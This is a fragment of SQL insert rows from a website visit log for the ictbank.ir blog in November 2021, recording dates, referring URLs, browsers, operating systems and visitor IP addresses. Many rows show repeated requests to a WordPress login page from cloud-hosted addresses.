(15500,'2021-11-21','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.219.231.8','000',0,1,0),
(15501,'2021-11-21','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','35.167.150.80','000',0,2,0),
(15502,'2021-11-21','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.23.100.115','000',0,1,0),
(15503,'2021-11-21','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.224.96.33','000',0,1,0),
(15504,'2021-11-21','http://ictbank.ir/blog','Chrome','OS X','10.13.6',NULL,NULL,'','93.158.92.207','000',0,1,0),
(15505,'2021-11-21','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','108.167.189.77','000',0,1,0),
(15506,'2021-11-21','http://ictbank.ir/blog','Opera','Windows','10.0',NULL,NULL,'','145.255.2.123','000',0,2,0),
(15507,'2021-11-21','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','193.118.53.194','000',0,2,0),
(15508,'2021-11-21','http://ictbank.ir/blog','Vivaldi','Windows','10.0',NULL,NULL,'','45.252.189.4','000',0,11,0),
(15509,'2021-11-21','http://www.ictbank.ir/blog','Vivaldi','Windows','10.0',NULL,NULL,'','50.3.88.168','000',0,2,0),
(15510,'2021-11-21','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.208.199.112','000',0,1,0),
(15511,'2021-11-21','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','196.18.229.206','000',0,2,0),
(15512,'2021-11-21','http://ictbank.ir/blog','Vivaldi','Windows','10.0',NULL,NULL,'','176.103.223.53','000',0,13,0),
(15513,'2021-11-21','http://www.ictbank.ir/blog','Vivaldi','Windows','10.0',NULL,NULL,'','5.157.21.233','000',0,2,0),
(15514,'2021-11-21','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','43.242.215.221','000',0,2,0),
(15515,'2021-11-21','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','199.247.12.8','000',0,1,0),
(15516,'2021-11-21','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','192.248.163.106','000',0,2,0),
(15517,'2021-11-21','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','142.93.44.71','000',0,1,0),
(15518,'2021-11-21','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','80.82.77.192','000',0,2,0),
(15519,'2021-11-21','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','192.162.103.109','000',0,2,0),
(15520,'2021-11-22','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','45.9.73.231','000',0,2,0),
(15521,'2021-11-22','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.1.248.42','000',0,2,0),
(15522,'2021-11-22','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','45.146.164.110','000',0,6,0),
(15523,'2021-11-22','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','104.168.237.186','000',0,2,0),
(15524,'2021-11-22','https://www.google.com/','Chrome','Windows','10.0',NULL,NULL,'','192.82.92.201','000',0,1,0),
(15525,'2021-11-22','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','23.148.145.14','000',0,2,0),
(15526,'2021-11-22','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,4,0),
(15527,'2021-11-22','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.190.171.109','000',0,2,0),
(15528,'2021-11-22','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','45.158.15.146','000',0,2,0),
(15529,'2021-11-22','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','45.158.15.145','000',0,8,0),
(15530,'2021-11-22','http://ictbank.ir/blog','Chrome','Windows','6.2',NULL,NULL,'','34.230.79.242','000',0,2,0),
(15531,'2021-11-22','http://ictbank.ir/blog','Vivaldi','Windows','10.0',NULL,NULL,'','144.168.227.71','000',0,11,0),
(15532,'2021-11-22','http://www.ictbank.ir/blog','Vivaldi','Windows','10.0',NULL,NULL,'','107.174.236.227','000',0,2,0),
(15533,'2021-11-22','http://ictbank.ir/blog','Chrome','OS X','10.15.7',NULL,NULL,'','89.36.50.32','000',0,1,0),
(15534,'2021-11-22','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.213.227.127','000',0,1,0),
(15535,'2021-11-22','ictbank.ir','Chrome','Windows','6.1',NULL,NULL,'','212.83.147.15','000',0,1,0),
(15536,'2021-11-22','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.222.130.254','000',0,1,0),
(15537,'2021-11-22','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.117.193.235','000',0,1,0),
(15538,'2021-11-22','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.117.237.134','000',0,1,0),
(15539,'2021-11-22','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','52.14.175.81','000',0,1,0),
(15540,'2021-11-22','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.16.213.80','000',0,1,0),
(15541,'2021-11-22','http://ictbank.ir/blog','Chrome','OS X','10.15.7',NULL,NULL,'','107.150.89.211','000',0,1,0),
(15542,'2021-11-22','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.16.109.250','000',0,1,0),
(15543,'2021-11-22','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','165.232.88.121','000',0,1,0),
(15544,'2021-11-22','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','178.62.221.8','000',0,1,0),
(15545,'2021-11-22','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','192.248.169.62','000',0,1,0),
(15546,'2021-11-22','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','142.93.44.71','000',0,1,0),
(15547,'2021-11-22','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','193.118.53.202','000',0,2,0),
(15548,'2021-11-23','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','203.196.19.12','000',0,1,0),
(15549,'2021-11-23','http://ictbank.ir/blog','Safari','Windows','6.1',NULL,NULL,'','3.237.71.91','000',0,1,0),
(15550,'2021-11-23','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.209.162','000',0,2,0),
(15551,'2021-11-23','http://design-arena.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','46.166.187.72','000',0,2,0),
(15552,'2021-11-23','design-arena.ir','Chrome','Windows','6.1',NULL,NULL,'','188.165.230.142','000',0,2,0),
(15553,'2021-11-23','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','45.91.23.98','000',0,4,0),
(15554,'2021-11-23','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','139.162.207.84','000',0,2,0),
(15555,'2021-11-23','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','52.37.213.157','000',0,2,0),
(15556,'2021-11-23','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','185.180.143.79','000',0,2,0),
(15557,'2021-11-23','https://www.google.com/','Chrome','Android','5.1.1',NULL,NULL,'','83.123.106.16','000',0,1,0),
(15558,'2021-11-23','http://design-arena.ir/blog','Chrome','OS X','10.13.6',NULL,NULL,'','192.36.52.37','000',0,1,0),
(15559,'2021-11-23','http://design-arena.ir/blog/','Chrome','OS X','10.13.6',NULL,NULL,'','192.36.53.165','000',0,1,0),
(15560,'2021-11-23','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.141.34','000',0,2,0),
(15561,'2021-11-23','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.202.143.62','000',0,1,0),
(15562,'2021-11-23','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.136.19.165','000',0,2,0),
(15563,'2021-11-23','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.145.6.22','000',0,1,0),
(15564,'2021-11-23','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.20.222.112','000',0,1,0),
(15565,'2021-11-23','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.15.9.62','000',0,1,0),
(15566,'2021-11-23','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.216.249.217','000',0,1,0),
(15567,'2021-11-23','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.135.240.72','000',0,1,0),
(15568,'2021-11-23','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.128.182.201','000',0,1,0),
(15569,'2021-11-23','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.117.89.253','000',0,1,0),
(15570,'2021-11-23','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.128.34.166','000',0,1,0),
(15571,'2021-11-23','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.223.235.121','000',0,1,0),
(15572,'2021-11-23','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.135.185.95','000',0,1,0),
(15573,'2021-11-23','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.117.114.236','000',0,1,0),
(15574,'2021-11-23','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','13.52.186.215','000',0,1,0),
(15575,'2021-11-23','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','89.56.169.117','000',0,2,0),
(15576,'2021-11-23','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.191.145.182','000',0,1,0),
(15577,'2021-11-23','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.117.242.50','000',0,1,0),
(15578,'2021-11-23','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.220.210.19','000',0,1,0),
(15579,'2021-11-23','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.142.124.61','000',0,1,0),
(15580,'2021-11-23','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.23.59.238','000',0,1,0),
(15581,'2021-11-23','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.117.165.109','000',0,1,0),
(15582,'2021-11-23','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.135.231.58','000',0,1,0),
(15583,'2021-11-23','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.138.103.230','000',0,1,0),
(15584,'2021-11-23','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.15.33.105','000',0,1,0),
(15585,'2021-11-23','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.131.157.180','000',0,1,0),
(15586,'2021-11-23','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.216.186.234','000',0,1,0),
(15587,'2021-11-23','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.139.70.212','000',0,1,0),
(15588,'2021-11-23','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.21.37.28','000',0,1,0),
(15589,'2021-11-23','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.16.27.23','000',0,1,0),
(15590,'2021-11-23','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.140.253.148','000',0,1,0),
(15591,'2021-11-23','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','13.58.206.173','000',0,1,0),
(15592,'2021-11-23','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.144.230.155','000',0,1,0),
(15593,'2021-11-23','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.118.153.223','000',0,1,0),
(15594,'2021-11-23','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.140.250.76','000',0,1,0),
(15595,'2021-11-23','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','45.146.164.110','000',0,2,0),
(15596,'2021-11-23','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.119.126.145','000',0,1,0),
(15597,'2021-11-23','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.17.130.224','000',0,1,0),
(15598,'2021-11-23','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.216.210.65','000',0,1,0),
(15599,'2021-11-23','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.116.33.89','000',0,1,0),
(15600,'2021-11-23','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.12.241.218','000',0,1,0),
(15601,'2021-11-23','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.188.58.25','000',0,1,0),
(15602,'2021-11-23','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.221.204.203','000',0,1,0),
(15603,'2021-11-23','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.222.4.179','000',0,1,0),
(15604,'2021-11-23','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.16.124.160','000',0,1,0),
(15605,'2021-11-23','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','52.15.90.135','000',0,1,0),
(15606,'2021-11-23','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.188.64.97','000',0,1,0),
(15607,'2021-11-23','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.145.14.76','000',0,1,0),
(15608,'2021-11-23','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.145.56.164','000',0,1,0),
(15609,'2021-11-23','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.222.55.95','000',0,1,0),
(15610,'2021-11-23','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.142.238.1','000',0,1,0),
(15611,'2021-11-23','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.21.245.217','000',0,1,0),
(15612,'2021-11-23','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','165.22.120.64','000',0,1,0),
(15613,'2021-11-23','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','45.76.141.127','000',0,1,0),
(15614,'2021-11-23','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','192.248.163.106','000',0,2,0),
(15615,'2021-11-23','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.21.134.40','000',0,1,0),
(15616,'2021-11-23','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.144.193.126','000',0,1,0),
(15617,'2021-11-23','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.129.149.230','000',0,1,0),
(15618,'2021-11-23','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.134.103.165','000',0,1,0),
(15619,'2021-11-23','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.222.207.24','000',0,1,0),
(15620,'2021-11-23','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.134.134','000',0,2,0),
(15621,'2021-11-23','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.216.205.151','000',0,1,0),
(15622,'2021-11-23','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.128.25.188','000',0,1,0),
(15623,'2021-11-23','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.142.98.205','000',0,1,0),
(15624,'2021-11-23','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','13.58.63.111','000',0,1,0),
(15625,'2021-11-23','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.17.24.65','000',0,1,0),
(15626,'2021-11-23','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.223.117.56','000',0,1,0),
(15627,'2021-11-23','http://82.102.9.14/blog','Chrome','Linux','Unknown',NULL,NULL,'','118.123.105.67','000',0,2,0),
(15628,'2021-11-23','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.142.153.174','000',0,1,0),
(15629,'2021-11-23','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.219.242.95','000',0,1,0),
(15630,'2021-11-23','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.136.159.79','000',0,1,0),
(15631,'2021-11-23','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.218.244.164','000',0,1,0),
(15632,'2021-11-23','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.188.117.225','000',0,1,0),
(15633,'2021-11-23','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.145.13.120','000',0,1,0),
(15634,'2021-11-23','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.118.3.53','000',0,1,0),
(15635,'2021-11-23','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.142.140.180','000',0,1,0),
(15636,'2021-11-23','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.217.205.163','000',0,1,0),
(15637,'2021-11-23','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.15.43.92','000',0,1,0),
(15638,'2021-11-23','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','13.58.223.75','000',0,1,0),
(15639,'2021-11-23','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.191.219.87','000',0,1,0),
(15640,'2021-11-23','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.189.29.203','000',0,1,0),
(15641,'2021-11-23','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.139.109.0','000',0,1,0),
(15642,'2021-11-23','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.191.61.106','000',0,1,0),
(15643,'2021-11-23','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','52.14.175.81','000',0,1,0),
(15644,'2021-11-23','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.138.33.40','000',0,1,0),
(15645,'2021-11-23','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.16.46.140','000',0,1,0),
(15646,'2021-11-23','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.141.17.33','000',0,1,0),
(15647,'2021-11-23','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.128.247.208','000',0,1,0),
(15648,'2021-11-23','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.21.237.59','000',0,1,0),
(15649,'2021-11-23','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.22.79.180','000',0,1,0),
(15650,'2021-11-23','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.23.112.55','000',0,1,0),
(15651,'2021-11-23','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.216.181.235','000',0,1,0),
(15652,'2021-11-23','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.218.139.204','000',0,1,0),
(15653,'2021-11-23','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.16.83.212','000',0,1,0),
(15654,'2021-11-23','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.143.208.4','000',0,1,0),
(15655,'2021-11-23','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','13.57.244.34','000',0,1,0),
(15656,'2021-11-23','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.144.195.75','000',0,1,0),
(15657,'2021-11-23','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.135.248.180','000',0,1,0),
(15658,'2021-11-23','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.144.218.54','000',0,1,0),
(15659,'2021-11-23','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.101.141.59','000',0,1,0),
(15660,'2021-11-23','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.17.67.180','000',0,1,0),
(15661,'2021-11-23','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.224.135.41','000',0,1,0),
(15662,'2021-11-23','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.137.203.33','000',0,1,0),
(15663,'2021-11-23','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.119.134.111','000',0,1,0),
(15664,'2021-11-23','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.135.212.224','000',0,1,0),
(15665,'2021-11-23','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.118.199.254','000',0,1,0),
(15666,'2021-11-23','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.135.212.139','000',0,1,0),
(15667,'2021-11-23','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.144.176.36','000',0,1,0),
(15668,'2021-11-23','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.143.18.13','000',0,1,0),
(15669,'2021-11-23','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.16.154.162','000',0,1,0),
(15670,'2021-11-23','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.144.193.52','000',0,1,0),
(15671,'2021-11-23','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.141.25.173','000',0,1,0),
(15672,'2021-11-23','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.138.136.17','000',0,1,0),
(15673,'2021-11-23','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.224.34.197','000',0,1,0),
(15674,'2021-11-23','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.220.136.206','000',0,1,0),
(15675,'2021-11-23','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.116.241.82','000',0,1,0),
(15676,'2021-11-23','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.131.93.235','000',0,1,0),
(15677,'2021-11-23','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.145.51.124','000',0,1,0),
(15678,'2021-11-23','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.191.159.28','000',0,1,0),
(15679,'2021-11-23','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.17.133.136','000',0,1,0),
(15680,'2021-11-23','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.143.68.77','000',0,1,0),
(15681,'2021-11-23','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.117.85.246','000',0,1,0),
(15682,'2021-11-23','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.219.55.197','000',0,1,0),
(15683,'2021-11-23','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.129.68.154','000',0,1,0),
(15684,'2021-11-23','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','52.14.105.211','000',0,1,0),
(15685,'2021-11-23','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.141.17.226','000',0,1,0),
(15686,'2021-11-23','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','52.15.104.12','000',0,1,0),
(15687,'2021-11-23','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.17.208.215','000',0,1,0),
(15688,'2021-11-23','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.138.85.167','000',0,1,0),
(15689,'2021-11-23','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.21.230.105','000',0,1,0),
(15690,'2021-11-24','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.144.146.189','000',0,1,0),
(15691,'2021-11-24','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.133.156.187','000',0,1,0),
(15692,'2021-11-24','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.12.148.36','000',0,1,0),
(15693,'2021-11-24','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','52.15.173.161','000',0,1,0),
(15694,'2021-11-24','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.16.108.94','000',0,1,0),
(15695,'2021-11-24','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.133.58','000',0,2,0),
(15696,'2021-11-24','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.16.109.250','000',0,1,0),
(15697,'2021-11-24','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.15.200.153','000',0,1,0),
(15698,'2021-11-24','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.15.29.122','000',0,1,0),
(15699,'2021-11-24','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.217.223.242','000',0,1,0),
(15700,'2021-11-24','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.218.8.63','000',0,1,0),
(15701,'2021-11-24','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.117.196.17','000',0,2,0),
(15702,'2021-11-24','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.135.232.70','000',0,1,0),
(15703,'2021-11-24','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.135.63.230','000',0,1,0),
(15704,'2021-11-24','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.220.79.186','000',0,1,0),
(15705,'2021-11-24','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.129.250.11','000',0,1,0),
(15706,'2021-11-24','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.144.149.98','000',0,1,0),
(15707,'2021-11-24','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.129.248.42','000',0,1,0),
(15708,'2021-11-24','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.137.195.188','000',0,1,0),
(15709,'2021-11-24','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.222.175.188','000',0,1,0),
(15710,'2021-11-24','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.22.120.122','000',0,1,0),
(15711,'2021-11-24','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.118.157.104','000',0,1,0),
(15712,'2021-11-24','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.222.149.116','000',0,1,0),
